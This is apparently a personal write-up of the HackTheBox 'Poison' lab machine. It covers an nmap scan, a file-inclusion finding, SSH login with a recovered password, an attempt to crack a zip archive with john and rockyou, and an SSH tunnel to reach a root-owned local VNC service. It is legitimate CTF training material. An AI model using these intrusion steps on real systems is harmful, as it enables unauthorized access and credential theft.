0%

HackTheBox-Poison

poison

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
PORT   STATE SERVICE
22/tcp open ssh
80/tcp open http

┌─[root☺htb-yub7jfbxug]─[/home/htb-atsud0]
└──╼ #nmap -p 22,80 -sC -sV poison.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-15 15:52 UTC
Nmap scan report for poison.htb (10.129.1.254)
Host is up (0.25s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Port:80

20210416-09:27:01-_UXyz3i_UXyz3i_UXyz3i_qCZdPR

20210416-09:27:27-_VtWoXS_VtWoXS_VtWoXS_FBoZfn

20210416-09:28:07-_2bwtjV_2bwtjV_2bwtjV_H6yGGO

LFI

20210416-09:29:05-_8XQlaA_8XQlaA_8XQlaA_aqQMTo

20210416-09:29:24-_rzhkvn_rzhkvn_rzhkvn_firQFY

Port:22

Charix!2#4%6&8(0

Try to use this log in ssh

1
2
3
4
5
6
7
8
9
10
#ssh [email protected]
Password for [email protected]:
Last login: Mon Mar 19 16:38:00 2018 from 10.10.14.4

FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017

Welcome to FreeBSD!

[email protected]:~ % id
uid=1001(charix) gid=1001(charix) groups=1001(charix)

enum system..

/home/charix/secret.zip
a user toor

1
2
3
[+] Superusers
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:

try to unzip secret.zip

1
2
3
[email protected]:~ % unzip secret.zip
Archive: secret.zip
unzip: Passphrase required for this entry

have password. so try to crack it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ zip2john secret.zip > poison.zip.hash
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827

┌──(atsud0㉿kali)-[/tmp]
└─$ cat poison.zip.hash
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::secret.zip

┌──(atsud0㉿kali)-[/tmp]
└─$ john poison.zip.hash --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:03 DONE (2021-04-15 19:17) 0g/s 4426Kp/s 4426Kc/s 4426KC/s !!radzik<3..*7¡Vamos!
Session completed

emmm.let’s try to use the ssh password.

1
2
3
4
5
6
7
8
unzip secret.zip
Archive: secret.zip
[secret.zip] secret password:
extracting: secret

┌──(atsud0㉿kali)-[/tmp]
└─$ cat secret
[|Ֆz!

I dont know what is it.

1
2
3
4
5
6
7
8
9
10
11
[email protected]:~ % netstat -an -p tcp
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp4 0 80 10.129.1.254.22 10.10.16.69.54788 ESTABLISHED
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.80 *.* LISTEN
tcp6 0 0 *.80 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN
tcp4 0 0 127.0.0.1.5801 *.* LISTEN
tcp4 0 0 127.0.0.1.5901 *.* LISTEN

the port 5901,5801 looks like vnc port

1
2
3
 ps -auwwx |grep vnc
root 608 0.0 0.8 23620 7652 v0- I 17:28 0:00.16 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
charix 18498 0.0 0.0 412 316 1 R+ 03:40 0:00.00 grep vnc

use ssh password faild, so i try secret.

1
[email protected]:~ % ssh -NfL 0.0.0.0:1234:localhost:5901 127.0.0.1
1
vncviewer poison.htb

20210416-08:11:50-_H5s4dd_H5s4dd_H5s4dd_Vt84av